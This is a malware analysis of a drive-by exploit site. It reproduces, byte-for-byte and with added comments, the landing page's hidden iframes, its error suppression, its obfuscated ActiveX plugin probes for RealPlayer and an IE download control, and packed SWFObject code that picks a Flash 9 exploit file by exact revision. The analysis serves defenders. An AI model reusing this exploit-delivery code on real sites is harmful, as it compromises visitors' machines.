www.maigol[.]cn/index.htm (URL defanged — do not browse to it)

This is a partial analysis of the malicious site. The captured pages are reproduced below as found; the code is hostile and should only be examined in an isolated environment, never opened in a browser.

Content of index.htm

<script>
// Analyst notes (added): landing page as captured; the code is left byte-for-byte, only comments are added.
// The status-bar text "完成" ("done") mimics a finished page load, and the onerror handler swallows
// every script error so failed ActiveX probes or broken exploit iframes raise no dialog for the victim.
window.status="完成";
window.onerror=function(){return true;}
// 14.htm is loaded for every browser whose UA does not contain "msie 7"; re10.htm and flash.htm are
// loaded unconditionally. All iframes are height=0, i.e. invisible to the user.
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=14.htm></iframe>");
document.write("<iframe width=20 height=0 src=re10.htm></iframe>");
document.write("<iframe width=20 height=0 src=flash.htm></iframe>");
// Plugin probe #1: the hex-escaped ProgID decodes to "GLIEDown.IEDown.1". If the control instantiates,
// lz.htm (presumably the matching exploit page) is loaded.
// NOTE(review): the presence check depends on IE/JScript quirks. In a standards-compliant engine the
// catch parameter is scoped to the catch block, so `var f` stays undefined, `f!="[object Error]"` is
// always true and lz.htm is written regardless; "[object Error]" is also JScript's stringification of
// an Error object. The `;` between `catch` and `finally` is a syntax error for standards-compliant
// parsers — either JScript tolerated it or it is a transcription artifact (the author reports it ran).
try{var f;
var gw=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(f){};
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
// Plugin probe #2: decodes to "IERPCtl.IERPCtl.1" (the RealPlayer IE control — this is the "real"
// the author refers to). Same pattern as above; loads re11.htm when the control is present.
try{var m;
var ww=new ActiveXObject("\x49\x45\x52\x50\x43\x74\x6C\x2E\x49\x45\x52\x50\x43\x74\x6C\x2E\x31");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=re11.htm></iframe>");}}
</script>

At first glance we can see that the page fingerprints the victim's browser and plugins and loads a different exploit page for each: the two hex-escaped ActiveX ProgIDs decode to GLIEDown.IEDown.1 and IERPCtl.IERPCtl.1 (RealPlayer), and flash.htm targets the Flash player, so it is trying to exploit plugins such as RealPlayer, Flash (SWF) and others.

flash.htm in turn loads ilink.html and flink.html.

Content of flink.html

<script type="text/javascript" src="swfobject.js"></script>
<!-- Analyst notes (added): flink.html as captured; code left byte-for-byte, only comments added.
     The two placeholder divs are the targets SWFObject writes the exploit SWF into. -->
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
// The eval() below is the Dean Edwards "packer" wrapper (p,a,c,k,e,d): it rebuilds the real script by
// substituting the 37-word dictionary that follows the tokenised string, then eval()s the result.
// The unpacked script is reproduced further down the page. In short: it reads the installed Flash
// version through the SWFObject 1.5 API (deconcept.SWFObjectUtil.getPlayerVersion) and, for Flash 9
// only, embeds one of f16/f28/f45/f47/f64/f115.swf chosen by the exact revision (16/28/45/47/64/115);
// revisions >= 124 receive no SWF at all.
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))
+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);
k=[function(e){return d[e]}];
e=function(){return'\\w+'};c=1};
while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
return p}('6 4=A.z.y();3(4[\'x\']==9){h.g(\'j\').i=""; 3(4[\'5\']==w)
{6 2=f e("./v.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==u){6 2=f e("./t.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==s){6 2=f e("./r.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==q){6 2=f e("./p.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==o){6 2=f e("./n.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==m){6 2=f e("./l.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']>=k){3(h.g){h.g(\'j\').i=""}}}',37,37,'||so|if|version|rev|var|else|flashcontent||
write|000000|mymovie|swf|SWFObject|new|getElementById|document|
innerHTML|flashversion|124|f16|16|f28|28|f45|45|f47|47|f64|64|f115|115|
major|getPlayerVersion|SWFObjectUtil|deconcept'.split('|'),0,{}));
// Writes an empty string: no effect beyond the SWFObject write above.
document.write("")</script>

It is interesting to note that a legitimate tool, SWFObject (v1.5.1), is used. The packed function simply calls the SWFObject version-detection API to read the installed Flash Player version and then embeds the exploit SWF built for that exact revision; unpacked, the code is as follows:

// Analyst notes (added): unpacked form of the packer payload above; code left byte-for-byte.
// SWFObject 1.5's getPlayerVersion() returns an object with major/minor/rev fields.
var version=deconcept.SWFObjectUtil.getPlayerVersion();
// Only Flash Player 9 is targeted at all; other major versions fall through untouched.
if(version['major']==9){document.getElementById('flashversion').innerHTML="";
// One dedicated SWF per exact revision — 9.0.115, .64, .47, .45, .28, .16. A revision not in this
// list gets no SWF, so the exploit files appear to be build-specific (presumably one SWF per
// vulnerable player build; the page does not show what the SWFs contain).
// Each SWFObject is sized 0.1x0.1, i.e. effectively invisible, and written into #flashcontent.
if(version['rev']==115){var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else 
if(version['rev']==64){var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else 
if(version['rev']==47){var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else 
if(version['rev']==45){var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else 
if(version['rev']==28){var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else 
if(version['rev']==16){var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else 
// Revisions 124 and newer are deliberately skipped: this branch only re-clears #flashversion
// (already cleared above) and embeds nothing. That boundary suggests the targeted bug was fixed
// in 9.0.124 — an inference from the version gate, not something the page establishes.
if(version['rev']>=124){if(document.getElementById)
{document.getElementById('flashversion').innerHTML=""}}}
